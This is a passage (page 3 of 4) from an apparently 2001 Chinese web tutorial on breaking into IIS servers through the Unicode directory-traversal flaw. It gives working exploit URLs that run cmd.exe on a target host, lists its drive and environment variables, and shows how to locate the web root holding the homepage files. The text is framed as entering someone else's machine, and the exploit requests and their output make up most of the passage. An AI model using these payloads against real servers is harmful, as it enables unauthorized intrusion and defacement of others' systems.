您现在的位置是: E企业 > 安全之路 > 文献检索 > 正文




Unicode漏洞入侵图文讲解
2001-08-27· ·小蓉··yesky

上一页  1 2 3 4  下一页

三、进入目标主机

如果在IE浏览器的地址栏输入如下命令:http://203.69.X.X/scripts/..%255c..%255cwinnt/
system32/cmd.exe?/c+dir+c:\
就会看到类似下面的信息:

Directory of c:\
2001-06-11 03:47p 289 default.asp
2001-06-11 03:47p 289 default.htm
2001-03-09 04:35p DIR> Documents and Settings
2001-06-11 03:47p 289 index.asp
2001-06-11 03:47p 289 index.htm
2001-05-08 05:19a DIR> Inetpub
2001-05-19 10:37p DIR> MSSQL7
2001-03-09 04:22p DIR> Program Files
2001-05-23 06:21p DIR> WINNT
4 File(s) 1,156 bytes
5 Dir(s) 2,461,421,561 bytes free

这是已经看到目标主机的C盘根目录和文件了。

四、检查目标主机web页面文件存放位置

这时如果在IE浏览器的地址栏输入:

  http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set ,一般情况下都会出现以下内容:

CGI Error 注:有此信息很正常,下同
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ON
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=x.x.x.x
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=x.x.x.x
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN
PATH_TRANSLATED=c:\inetpub\wwwroot
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Fa

  现在,已看到目标主机的环境变量了,从中弄清楚主页文件所放路径,在本例中是放在c:\inetpub\wwwroot文件夹下。然后用命令:
http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/
c+dir+c:\inetpub\wwwroot
就可以看到c:\inetpub\wwwroot文件夹下的文件了,这里一般会有default.asp,default.htm,index.asp, index.htm等文件,这些就是默认的主页文件,当然每台机器、每个管理员设置的都会有所不同,具体情况请具体分析。

上一页  1 2 3 4  下一页

■ 相关内容
 黑客技术
 黑客是如何破解MS SQL SERCVER密码的
 黑客是如何破解MS SQL SERCVER密码的
 黑客入侵Windows NT的“武器库”
 网络管理员及攻击者的好帮手Wget使用详解
 AOL的实时传讯程序存在安全漏洞
 利用ASP服务攻击的漏洞描述及解决方法
 利用Unicode漏洞建立代理服务器
 利用Unicode漏洞进入Windows2000
感谢 访问天极网,如果您觉得该文章涉及版权问题,请看这里!